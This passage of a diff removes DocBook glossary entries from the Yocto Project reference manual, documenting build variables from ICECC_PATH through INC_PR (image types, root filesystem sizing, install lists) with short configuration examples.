-        </glossentry>
-
-        <glossentry id='var-ICECC_PATH'><glossterm>ICECC_PATH</glossterm>
-            <info>
-                ICECC_PATH[doc] = "The location of the icecc binary."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The location of the <filename>icecc</filename> binary.
-                    You can set this variable in your
-                    <filename>local.conf</filename> file.
-                    If your <filename>local.conf</filename> file does not define
-                    this variable, the
-                    <link linkend='ref-classes-icecc'><filename>icecc</filename></link>
-                    class attempts to define it by locating
-                    <filename>icecc</filename> using <filename>which</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ICECC_USER_CLASS_BL'><glossterm>ICECC_USER_CLASS_BL</glossterm>
-            <info>
-                ICECC_USER_CLASS_BL[doc] = "Identifies user classes that you do not want the Icecream distributed compile support to consider."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Identifies user classes that you do not want the
-                    Icecream distributed compile support to consider.
-                    This variable is used by the
-                    <link linkend='ref-classes-icecc'><filename>icecc</filename></link>
-                    class.
-                    You set this variable in your
-                    <filename>local.conf</filename> file.
-                </para>
-
-                <para>
-                    When you list classes using this variable, you are
-                    "blacklisting" them from distributed compilation across
-                    remote hosts.
-                    Any classes you list will be distributed and compiled
-                    locally.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ICECC_USER_PACKAGE_BL'><glossterm>ICECC_USER_PACKAGE_BL</glossterm>
-            <info>
-                ICECC_USER_PACKAGE_BL[doc] = "Identifies user recipes that you do not want the Icecream distributed compile support to consider."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Identifies user recipes that you do not want the
-                    Icecream distributed compile support to consider.
-                    This variable is used by the
-                    <link linkend='ref-classes-icecc'><filename>icecc</filename></link>
-                    class.
-                    You set this variable in your
-                    <filename>local.conf</filename> file.
-                </para>
-
-                <para>
-                    When you list packages using this variable, you are
-                    "blacklisting" them from distributed compilation across
-                    remote hosts.
-                    Any packages you list will be distributed and compiled
-                    locally.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ICECC_USER_PACKAGE_WL'><glossterm>ICECC_USER_PACKAGE_WL</glossterm>
-            <info>
-                ICECC_USER_PACKAGE_WL[doc] = "Identifies user recipes that use an empty PARALLEL_MAKE variable that you want to force remote distributed compilation on using the Icecream distributed compile support."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Identifies user recipes that use an empty
-                    <link linkend='var-PARALLEL_MAKE'><filename>PARALLEL_MAKE</filename></link>
-                    variable that you want to force remote distributed
-                    compilation on using the Icecream distributed compile
-                    support.
-                    This variable is used by the
-                    <link linkend='ref-classes-icecc'><filename>icecc</filename></link>
-                    class.
-                    You set this variable in your
-                    <filename>local.conf</filename> file.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_BASENAME'><glossterm>IMAGE_BASENAME</glossterm>
-            <info>
-                IMAGE_BASENAME[doc] = "The base name of image output files."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The base name of image output files.
-                    This variable defaults to the recipe name
-                    (<filename>${</filename><link linkend='var-PN'><filename>PN</filename></link><filename>}</filename>).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_BOOT_FILES'><glossterm>IMAGE_BOOT_FILES</glossterm>
-            <info>
-                IMAGE_BOOT_FILES[doc] = "A space-separated list of files from ${DEPLOY_DIR_IMAGE} to place in boot partition."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A space-separated list of files installed into the
-                    boot partition when preparing an image using the Wic tool
-                    with the <filename>bootimg-partition</filename> source
-                    plugin.
-                    By default, the files are installed under the same name as
-                    the source files.
-                    To change the installed name, separate it from the
-                    original name with a semi-colon (;).
-                    Source files need to be located in
-                    <link linkend='var-DEPLOY_DIR_IMAGE'><filename>DEPLOY_DIR_IMAGE</filename></link>.
-                    Here are two examples:
-
-                    <literallayout class="monospaced">
-     IMAGE_BOOT_FILES = "u-boot.img uImage;kernel"
-     IMAGE_BOOT_FILES = "u-boot.${UBOOT_SUFFIX} ${KERNEL_IMAGETYPE}"
-                    </literallayout>
-                </para>
-
-                <para>
-                    Alternatively, source files can be picked up using
-                    a glob pattern.
-                    In this case, the destination file must have the same name
-                    as the base name of the source file path.
-                    To install files into a directory within the
-                    target location, pass its name after a semi-colon
-                    (;).
-                    Here are two examples:
-                    <literallayout class="monospaced">
-     IMAGE_BOOT_FILES = "bcm2835-bootfiles/*"
-     IMAGE_BOOT_FILES = "bcm2835-bootfiles/*;boot/"
-                    </literallayout>
-                    The first example installs all files from
-                    <filename>${DEPLOY_DIR_IMAGE}/bcm2835-bootfiles</filename>
-                    into the root of the target partition.
-                    The second example installs the same files into a
-                    <filename>boot</filename> directory within the
-                    target partition.
-                </para>
-
-                <para>
-                    You can find information on how to use the Wic tool in the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-partitioned-images-using-wic'>Creating Partitioned Images Using Wic</ulink>"
-                    section of the Yocto Project Development Tasks Manual.
-                    Reference material for Wic is located in the
-                    "<ulink url='&YOCTO_DOCS_REF_URL;#ref-kickstart'>OpenEmbedded Kickstart (.wks) Reference</ulink>"
-                    chapter.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_CLASSES'><glossterm>IMAGE_CLASSES</glossterm>
-            <info>
-                IMAGE_CLASSES[doc] = "A list of classes that all images should inherit."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A list of classes that all images should inherit.
-                    You typically use this variable to specify the list of
-                    classes that register the different types of images
-                    the OpenEmbedded build system creates.
-                </para>
-
-                <para>
-                    The default value for <filename>IMAGE_CLASSES</filename> is
-                    <filename>image_types</filename>.
-                    You can set this variable in your
-                    <filename>local.conf</filename> or in a distribution
-                    configuration file.
-                </para>
-
-                <para>
-                    For more information, see
-                    <filename>meta/classes/image_types.bbclass</filename> in the
-                    <link linkend='source-directory'>Source Directory</link>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_CMD'><glossterm>IMAGE_CMD</glossterm>
-            <info>
-                IMAGE_CMD[doc] = "Specifies the command to create the image file for a specific image type, which corresponds to the value set set in IMAGE_FSTYPES, (e.g. ext3, btrfs, and so forth)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the command to create the image file for a
-                    specific image type, which corresponds to the value set
-                    set in
-                    <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>,
-                    (e.g. <filename>ext3</filename>,
-                    <filename>btrfs</filename>, and so forth).
-                    When setting this variable, you should use
-                    an override for the associated type.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     IMAGE_CMD_jffs2 = "mkfs.jffs2 --root=${IMAGE_ROOTFS} \
-        --faketime --output=${DEPLOY_DIR_IMAGE}/${IMAGE_NAME}.rootfs.jffs2 \
-        ${EXTRA_IMAGECMD}"
-                    </literallayout>
-                </para>
-
-                <para>
-                    You typically do not need to set this variable unless
-                    you are adding support for a new image type.
-                    For more examples on how to set this variable, see the
-                    <link linkend='ref-classes-image_types'><filename>image_types</filename></link>
-                    class file, which is
-                    <filename>meta/classes/image_types.bbclass</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_DEVICE_TABLES'><glossterm>IMAGE_DEVICE_TABLES</glossterm>
-            <info>
-                IMAGE_DEVICE_TABLES[doc] = "Specifies one or more files that contain custom device tables that are passed to the makedevs command as part of creating an image."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies one or more files that contain custom device
-                    tables that are passed to the
-                    <filename>makedevs</filename> command as part of creating
-                    an image.
-                    These files list basic device nodes that should be
-                    created under <filename>/dev</filename> within the image.
-                    If <filename>IMAGE_DEVICE_TABLES</filename> is not set,
-                    <filename>files/device_table-minimal.txt</filename> is
-                    used, which is located by
-                    <link linkend='var-BBPATH'><filename>BBPATH</filename></link>.
-                    For details on how you should write device table files,
-                    see <filename>meta/files/device_table-minimal.txt</filename>
-                    as an example.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_FEATURES'><glossterm>IMAGE_FEATURES</glossterm>
-            <info>
-                IMAGE_FEATURES[doc] = "The primary list of features to include in an image. Configure this variable in an image recipe."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The primary list of features to include in an image.
-                    Typically, you configure this variable in an image recipe.
-                    Although you can use this variable from your
-                    <filename>local.conf</filename> file, which is found in the
-                    <link linkend='build-directory'>Build Directory</link>,
-                    best practices dictate that you do not.
-                    <note>
-                        To enable extra features from outside the image recipe,
-                        use the
-                        <filename><link linkend='var-EXTRA_IMAGE_FEATURES'>EXTRA_IMAGE_FEATURES</link></filename> variable.
-                    </note>
-                </para>
-
-                <para>
-                    For a list of image features that ships with the Yocto
-                    Project, see the
-                    "<link linkend="ref-features-image">Image Features</link>"
-                    section.
-                </para>
-
-                <para>
-                    For an example that shows how to customize your image by
-                    using this variable, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#usingpoky-extend-customimage-imagefeatures'>Customizing Images Using Custom <filename>IMAGE_FEATURES</filename> and <filename>EXTRA_IMAGE_FEATURES</filename></ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_FSTYPES'><glossterm>IMAGE_FSTYPES</glossterm>
-            <info>
-                IMAGE_FSTYPES[doc] = "Formats of root filesystem images that you want to have created."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the formats the OpenEmbedded build system uses
-                    during the build when creating the root filesystem.
-                    For example, setting <filename>IMAGE_FSTYPES</filename>
-                    as follows causes the build system to create root
-                    filesystems using two formats: <filename>.ext3</filename>
-                    and <filename>.tar.bz2</filename>:
-                    <literallayout class='monospaced'>
-     IMAGE_FSTYPES = "ext3 tar.bz2"
-                    </literallayout>
-                </para>
-
-                <para>
-                    For the complete list of supported image formats from which
-                    you can choose, see
-                    <link linkend='var-IMAGE_TYPES'><filename>IMAGE_TYPES</filename></link>.
-                </para>
-
-                <note><title>Notes</title>
-                    <itemizedlist>
-                        <listitem><para>
-                            If an image recipe uses the "inherit image" line
-                            and you are setting
-                            <filename>IMAGE_FSTYPES</filename> inside the
-                            recipe, you must set
-                            <filename>IMAGE_FSTYPES</filename> prior to
-                            using the "inherit image" line.
-                            </para></listitem>
-                        <listitem><para>
-                            Due to the way the OpenEmbedded build system
-                            processes this variable, you cannot update its
-                            contents by using <filename>_append</filename> or
-                            <filename>_prepend</filename>.
-                            You must use the <filename>+=</filename>
-                            operator to add one or more options to the
-                            <filename>IMAGE_FSTYPES</filename> variable.
-                            </para></listitem>
-                    </itemizedlist>
-                </note>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_INSTALL'><glossterm>IMAGE_INSTALL</glossterm>
-            <info>
-                IMAGE_INSTALL[doc] = "Used by recipes to specify the packages to install into an image through image.bbclass."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Used by recipes to specify the packages to install into an
-                    image through the
-                    <link linkend='ref-classes-image'><filename>image</filename></link>
-                    class.
-                    Use the <filename>IMAGE_INSTALL</filename> variable with
-                    care to avoid ordering issues.
-                </para>
-
-                <para>
-                    Image recipes set <filename>IMAGE_INSTALL</filename>
-                    to specify the packages to install into an image through
-                    <filename>image.bbclass</filename>.
-                    Additionally, "helper" classes such as the
-                    <link linkend='ref-classes-core-image'><filename>core-image</filename></link>
-                    class exist that can take lists used with
-                    <filename><link linkend='var-IMAGE_FEATURES'>IMAGE_FEATURES</link></filename>
-                    and turn them into auto-generated entries in
-                    <filename>IMAGE_INSTALL</filename> in addition to its
-                    default contents.
-                </para>
-
-                <para>
-                    When you use this variable, it is best to use it as follows:
-                    <literallayout class='monospaced'>
-     IMAGE_INSTALL_append = " <replaceable>package-name</replaceable>"
-                    </literallayout>
-                    Be sure to include the space between the quotation character
-                    and the start of the package name or names.
-                    <note><title>Caution</title>
-                        <itemizedlist>
-                            <listitem><para>
-                                When working with a
-                                <link linkend='images-core-image-minimal-initramfs'><filename>core-image-minimal-initramfs</filename></link>
-                                image, do not use the
-                                <filename>IMAGE_INSTALL</filename> variable to
-                                specify packages for installation.
-                                Instead, use the
-                                <link linkend='var-PACKAGE_INSTALL'><filename>PACKAGE_INSTALL</filename></link>
-                                variable, which allows the initial RAM
-                                filesystem (initramfs) recipe to use a fixed
-                                set of packages and not be affected by
-                                <filename>IMAGE_INSTALL</filename>.
-                                For information on creating an initramfs, see
-                                the
-                                "<ulink url='&YOCTO_DOCS_DEV_URL;#building-an-initramfs-image'>Building an Initial RAM Filesystem (initramfs) Image</ulink>"
-                                section in the Yocto Project Development Tasks
-                                Manual.
-                                </para></listitem>
-                            <listitem><para>
-                                Using <filename>IMAGE_INSTALL</filename> with
-                                the
-                                <ulink url='&YOCTO_DOCS_BB_URL;#appending-and-prepending'><filename>+=</filename></ulink>
-                                BitBake operator within the
-                                <filename>/conf/local.conf</filename> file or
-                                from within an image recipe is not recommended.
-                                Use of this operator in these ways can cause
-                                ordering issues.
-                                Since <filename>core-image.bbclass</filename>
-                                sets <filename>IMAGE_INSTALL</filename> to a
-                                default value using the
-                                <ulink url='&YOCTO_DOCS_BB_URL;#setting-a-default-value'><filename>?=</filename></ulink>
-                                operator, using a <filename>+=</filename>
-                                operation against
-                                <filename>IMAGE_INSTALL</filename> results in
-                                unexpected behavior when used within
-                                <filename>conf/local.conf</filename>.
-                                Furthermore, the same operation from within
-                                an image recipe may or may not succeed
-                                depending on the specific situation.
-                                In both these cases, the behavior is contrary
-                                to how most users expect the
-                                <filename>+=</filename> operator to work.
-                                </para></listitem>
-                        </itemizedlist>
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_LINGUAS'><glossterm>IMAGE_LINGUAS</glossterm>
-            <info>
-                IMAGE_LINGUAS[doc] = "Specifies the list of locales to install into the image during the root filesystem construction process."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the list of locales to install into the image
-                    during the root filesystem construction process.
-                    The OpenEmbedded build system automatically splits locale
-                    files, which are used for localization, into separate
-                    packages.
-                    Setting the <filename>IMAGE_LINGUAS</filename> variable
-                    ensures that any locale packages that correspond to packages
-                    already selected for installation into the image are also
-                    installed.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     IMAGE_LINGUAS = "pt-br de-de"
-                    </literallayout>
-                </para>
-
-                <para>
-                    In this example, the build system ensures any Brazilian
-                    Portuguese and German locale files that correspond to
-                    packages in the image are installed (i.e.
-                    <filename>*-locale-pt-br</filename>
-                    and <filename>*-locale-de-de</filename> as well as
-                    <filename>*-locale-pt</filename>
-                    and <filename>*-locale-de</filename>, since some software
-                    packages only provide locale files by language and not by
-                    country-specific language).
-                </para>
-
-                <para>
-                    See the
-                    <link linkend='var-GLIBC_GENERATE_LOCALES'><filename>GLIBC_GENERATE_LOCALES</filename></link>
-                    variable for information on generating GLIBC locales.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_MANIFEST'><glossterm>IMAGE_MANIFEST</glossterm>
-            <info>
-                IMAGE_MANIFEST[doc] = "The manifest file for the image. This file lists all the installed packages that make up the image."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The manifest file for the image.
-                    This file lists all the installed packages that make up
-                    the image.
-                    The file contains package information on a line-per-package
-                    basis as follows:
-                    <literallayout class='monospaced'>
-     <replaceable>packagename</replaceable> <replaceable>packagearch</replaceable> <replaceable>version</replaceable>
-                    </literallayout>
-                </para>
-
-                <para>
-                    The
-                    <link linkend='ref-classes-image'><filename>image</filename></link>
-                    class defines the manifest file as follows:
-                    <literallayout class='monospaced'>
-     IMAGE_MANIFEST = "${DEPLOY_DIR_IMAGE}/${IMAGE_NAME}.rootfs.manifest"
-                    </literallayout>
-                    The location is derived using the
-                    <link linkend='var-DEPLOY_DIR_IMAGE'><filename>DEPLOY_DIR_IMAGE</filename></link>
-                    and
-                    <link linkend='var-IMAGE_NAME'><filename>IMAGE_NAME</filename></link>
-                    variables.
-                    You can find information on how the image
-                    is created in the
-                    "<ulink url='&YOCTO_DOCS_OM_URL;#image-generation-dev-environment'>Image Generation</ulink>"
-                    section in the Yocto Project Overview and Concepts Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_NAME'><glossterm>IMAGE_NAME</glossterm>
-            <info>
-                IMAGE_NAME[doc] = "The name of the output image files minus the extension."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The name of the output image files minus the extension.
-                    This variable is derived using the
-                    <link linkend='var-IMAGE_BASENAME'><filename>IMAGE_BASENAME</filename></link>,
-                    <link linkend='var-MACHINE'><filename>MACHINE</filename></link>,
-                    and
-                    <link linkend='var-DATETIME'><filename>DATETIME</filename></link>
-                    variables:
-                    <literallayout class='monospaced'>
-     IMAGE_NAME = "${IMAGE_BASENAME}-${MACHINE}-${DATETIME}"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_OVERHEAD_FACTOR'><glossterm>IMAGE_OVERHEAD_FACTOR</glossterm>
-            <info>
-                IMAGE_OVERHEAD_FACTOR[doc] = "Defines a multiplier that the build system applies to the initial image size for cases when the multiplier times the returned disk usage value for the image is greater than the sum of IMAGE_ROOTFS_SIZE and IMAGE_ROOTFS_EXTRA_SPACE."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines a multiplier that the build system applies to the initial image
-                    size for cases when the multiplier times the returned disk usage value
-                    for the image is greater than the sum of
-                    <filename><link linkend='var-IMAGE_ROOTFS_SIZE'>IMAGE_ROOTFS_SIZE</link></filename>
-                    and
-                    <filename><link linkend='var-IMAGE_ROOTFS_EXTRA_SPACE'>IMAGE_ROOTFS_EXTRA_SPACE</link></filename>.
-                    The result of the multiplier applied to the initial image size creates
-                    free disk space in the image as overhead.
-                    By default, the build process uses a multiplier of 1.3 for this variable.
-                    This default value results in 30% free disk space added to the image when this
-                    method is used to determine the final generated image size.
-                    You should be aware that post install scripts and the package management
-                    system uses disk space inside this overhead area.
-                    Consequently, the multiplier does not produce an image with
-                    all the theoretical free disk space.
-                    See <filename><link linkend='var-IMAGE_ROOTFS_SIZE'>IMAGE_ROOTFS_SIZE</link></filename>
-                    for information on how the build system determines the overall image size.
-                </para>
-
-                <para>
-                    The default 30% free disk space typically gives the image enough room to boot
-                    and allows for basic post installs while still leaving a small amount of
-                    free disk space.
-                    If 30% free space is inadequate, you can increase the default value.
-                    For example, the following setting gives you 50% free space added to the image:
-                    <literallayout class='monospaced'>
-     IMAGE_OVERHEAD_FACTOR = "1.5"
-                    </literallayout>
-                </para>
-
-                <para>
-                    Alternatively, you can ensure a specific amount of free disk space is added
-                    to the image by using the
-                    <filename><link linkend='var-IMAGE_ROOTFS_EXTRA_SPACE'>IMAGE_ROOTFS_EXTRA_SPACE</link></filename>
-                    variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_PKGTYPE'><glossterm>IMAGE_PKGTYPE</glossterm>
-            <info>
-                IMAGE_PKGTYPE[doc] = "Defines the package type (i.e. DEB, RPM, IPK, or TAR) used by the OpenEmbedded build system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines the package type (i.e. DEB, RPM, IPK, or TAR) used
-                    by the OpenEmbedded build system.
-                    The variable is defined appropriately by the
-                    <link linkend='ref-classes-package_deb'><filename>package_deb</filename></link>,
-                    <link linkend='ref-classes-package_rpm'><filename>package_rpm</filename></link>,
-                    <link linkend='ref-classes-package_ipk'><filename>package_ipk</filename></link>,
-                    or
-                    <link linkend='ref-classes-package_tar'><filename>package_tar</filename></link>
-                    class.
-                    <note><title>Warning</title>
-                        The <filename>package_tar</filename> class is broken
-                        and is not supported.
-                        It is recommended that you do not use it.
-                    </note>
-                </para>
-
-                <para>
-                    The
-                    <link linkend='ref-classes-populate-sdk-*'><filename>populate_sdk_*</filename></link>
-                    and
-                    <link linkend='ref-classes-image'><filename>image</filename></link>
-                    classes use the <filename>IMAGE_PKGTYPE</filename> for
-                    packaging up images and SDKs.
-                </para>
-
-                <para>
-                    You should not set the <filename>IMAGE_PKGTYPE</filename>
-                    manually.
-                    Rather, the variable is set indirectly through the
-                    appropriate
-                    <link linkend='ref-classes-package'><filename>package_*</filename></link>
-                    class using the
-                    <link linkend='var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></link>
-                    variable.
-                    The OpenEmbedded build system uses the first package type
-                    (e.g. DEB, RPM, or IPK) that appears with the variable
-                    <note>
-                        Files using the <filename>.tar</filename> format are
-                        never used as a substitute packaging format for DEB,
-                        RPM, and IPK formatted files for your image or SDK.
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_POSTPROCESS_COMMAND'><glossterm>IMAGE_POSTPROCESS_COMMAND</glossterm>
-            <info>
-                IMAGE_POSTPROCESS_COMMAND[doc] = "Specifies a list of functions to call once the OpenEmbedded build system creates the final image output files."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of functions to call once the
-                    OpenEmbedded build system creates the final image
-                    output files.
-                    You can specify functions separated by semicolons:
-                    <literallayout class='monospaced'>
-     IMAGE_POSTPROCESS_COMMAND += "<replaceable>function</replaceable>; ... "
-                    </literallayout>
-                </para>
-
-                <para>
-                    If you need to pass the root filesystem path to a command
-                    within the function, you can use
-                    <filename>${IMAGE_ROOTFS}</filename>, which points to
-                    the directory that becomes the root filesystem image.
-                    See the
-                    <link linkend='var-IMAGE_ROOTFS'><filename>IMAGE_ROOTFS</filename></link>
-                    variable for more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_PREPROCESS_COMMAND'><glossterm>IMAGE_PREPROCESS_COMMAND</glossterm>
-            <info>
-                IMAGE_PREPROCESS_COMMAND[doc] = "Specifies a list of functions to call before the OpenEmbedded build system creates the final image output files."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a list of functions to call before the
-                    OpenEmbedded build system creates the final image
-                    output files.
-                    You can specify functions separated by semicolons:
-                    <literallayout class='monospaced'>
-     IMAGE_PREPROCESS_COMMAND += "<replaceable>function</replaceable>; ... "
-                    </literallayout>
-                </para>
-
-                <para>
-                    If you need to pass the root filesystem path to a command
-                    within the function, you can use
-                    <filename>${IMAGE_ROOTFS}</filename>, which points to
-                    the directory that becomes the root filesystem image.
-                    See the
-                    <link linkend='var-IMAGE_ROOTFS'><filename>IMAGE_ROOTFS</filename></link>
-                    variable for more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_ROOTFS'><glossterm>IMAGE_ROOTFS</glossterm>
-            <info>
-                IMAGE_ROOTFS[doc] = "The location of the root filesystem while it is under construction (i.e. during do_rootfs)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The location of the root filesystem while it is under
-                    construction (i.e. during the
-                    <link linkend='ref-tasks-rootfs'><filename>do_rootfs</filename></link>
-                    task).
-                    This variable is not configurable.
-                    Do not change it.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_ROOTFS_ALIGNMENT'><glossterm>IMAGE_ROOTFS_ALIGNMENT</glossterm>
-            <info>
-                IMAGE_ROOTFS_ALIGNMENT[doc] = "Specifies the alignment for the output image file in Kbytes."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the alignment for the output image file in
-                    Kbytes.
-                    If the size of the image is not a multiple of
-                    this value, then the size is rounded up to the nearest
-                    multiple of the value.
-                    The default value is "1".
-                    See
-                    <link linkend='var-IMAGE_ROOTFS_SIZE'><filename>IMAGE_ROOTFS_SIZE</filename></link>
-                    for additional information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_ROOTFS_EXTRA_SPACE'><glossterm>IMAGE_ROOTFS_EXTRA_SPACE</glossterm>
-            <info>
-                IMAGE_ROOTFS_EXTRA_SPACE[doc] = "Defines additional free disk space created in the image in Kbytes. By default, this variable is set to '0'."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines additional free disk space created in the image in Kbytes.
-                    By default, this variable is set to "0".
-                    This free disk space is added to the image after the build system determines
-                    the image size as described in
-                    <filename><link linkend='var-IMAGE_ROOTFS_SIZE'>IMAGE_ROOTFS_SIZE</link></filename>.
-                </para>
-
-                <para>
-                    This variable is particularly useful when you want to ensure that a
-                    specific amount of free disk space is available on a device after an image
-                    is installed and running.
-                    For example, to be sure 5 Gbytes of free disk space is available, set the
-                    variable as follows:
-                    <literallayout class='monospaced'>
-     IMAGE_ROOTFS_EXTRA_SPACE = "5242880"
-                    </literallayout>
-                </para>
-
-                <para>
-                    For example, the Yocto Project Build Appliance specifically requests 40 Gbytes
-                    of extra space with the line:
-                    <literallayout class='monospaced'>
-     IMAGE_ROOTFS_EXTRA_SPACE = "41943040"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_ROOTFS_SIZE'><glossterm>IMAGE_ROOTFS_SIZE</glossterm>
-            <info>
-                IMAGE_ROOTFS_SIZE[doc] = "Defines the size in Kbytes for the generated image."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines the size in Kbytes for the generated image.
-                    The OpenEmbedded build system determines the final size for the generated
-                    image using an algorithm that takes into account the initial disk space used
-                    for the generated image, a requested size for the image, and requested
-                    additional free disk space to be added to the image.
-                    Programatically, the build system determines the final size of the
-                    generated image as follows:
-                    <literallayout class='monospaced'>
-    if (image-du * overhead) &lt; rootfs-size:
-	internal-rootfs-size = rootfs-size + xspace
-    else:
-	internal-rootfs-size = (image-du * overhead) + xspace
-
-    where:
-
-      image-du = Returned value of the du command on
-                 the image.
-
-      overhead = IMAGE_OVERHEAD_FACTOR
-
-      rootfs-size = IMAGE_ROOTFS_SIZE
-
-      internal-rootfs-size = Initial root filesystem
-                             size before any modifications.
-
-      xspace = IMAGE_ROOTFS_EXTRA_SPACE
-                    </literallayout>
-                </para>
-
-                <para>
-                    See the <link linkend='var-IMAGE_OVERHEAD_FACTOR'><filename>IMAGE_OVERHEAD_FACTOR</filename></link>
-                    and <link linkend='var-IMAGE_ROOTFS_EXTRA_SPACE'><filename>IMAGE_ROOTFS_EXTRA_SPACE</filename></link>
-                    variables for related information.
-<!--                    In the above example, <filename>overhead</filename> is defined by the
-                    <filename><link linkend='var-IMAGE_OVERHEAD_FACTOR'>IMAGE_OVERHEAD_FACTOR</link></filename>
-                    variable, <filename>xspace</filename> is defined by the
-                    <filename><link linkend='var-IMAGE_ROOTFS_EXTRA_SPACE'>IMAGE_ROOTFS_EXTRA_SPACE</link></filename>
-                    variable, and <filename>du</filename> is the results of the disk usage command
-                    on the initially generated image. -->
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_TYPEDEP'><glossterm>IMAGE_TYPEDEP</glossterm>
-            <info>
-                IMAGE_TYPEDEP[doc] = "Specifies a dependency from one image type on another."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies a dependency from one image type on another.
-                    Here is an example from the
-                    <link linkend='ref-classes-image-live'><filename>image-live</filename></link>
-                    class:
-                    <literallayout class='monospaced'>
-     IMAGE_TYPEDEP_live = "ext3"
-                    </literallayout>
-                </para>
-
-                <para>
-                    In the previous example, the variable ensures that when
-                    "live" is listed with the
-                    <link linkend='var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></link>
-                    variable, the OpenEmbedded build system produces an
-                    <filename>ext3</filename> image first since one of the
-                    components of the live
-                    image is an <filename>ext3</filename>
-                    formatted partition containing the root
-                    filesystem.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-IMAGE_TYPES'><glossterm>IMAGE_TYPES</glossterm>
-            <info>
-                IMAGE_TYPES[doc] = "Specifies the complete list of supported image types by default."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the complete list of supported image types
-                    by default:
-                    <literallayout class='monospaced'>
-     btrfs
-     container
-     cpio
-     cpio.gz
-     cpio.lz4
-     cpio.lzma
-     cpio.xz
-     cramfs
-     ext2
-     ext2.bz2
-     ext2.gz
-     ext2.lzma
-     ext3
-     ext3.gz
-     ext4
-     ext4.gz
-     f2fs
-     hddimg
-     iso
-     jffs2
-     jffs2.sum
-     multiubi
-     squashfs
-     squashfs-lz4
-     squashfs-lzo
-     squashfs-xz
-     tar
-     tar.bz2
-     tar.gz
-     tar.lz4
-     tar.xz
-     tar.zst
-     ubi
-     ubifs
-     wic
-     wic.bz2
-     wic.gz
-     wic.lzma
-                    </literallayout>
-                </para>
-
-                <para>
-                    For more information about these types of images, see
-                    <filename>meta/classes/image_types*.bbclass</filename>
-                    in the
-                    <link linkend='source-directory'>Source Directory</link>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-INC_PR'><glossterm>INC_PR</glossterm>
-            <info>
-                INC_PR[doc] = "Helps define the recipe revision for recipes that share a common include file."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Helps define the recipe revision for recipes that share
-                    a common <filename>include</filename> file.
-                    You can think of this variable as part of the recipe revision
-                    as set from within an include file.
-                </para>
-
-                <para>
-                    Suppose, for example, you have a set of recipes that
-                    are used across several projects.
-                    And, within each of those recipes the revision
-                    (its <link linkend='var-PR'><filename>PR</filename></link>
-                    value) is set accordingly.
-                    In this case, when the revision of those recipes changes,
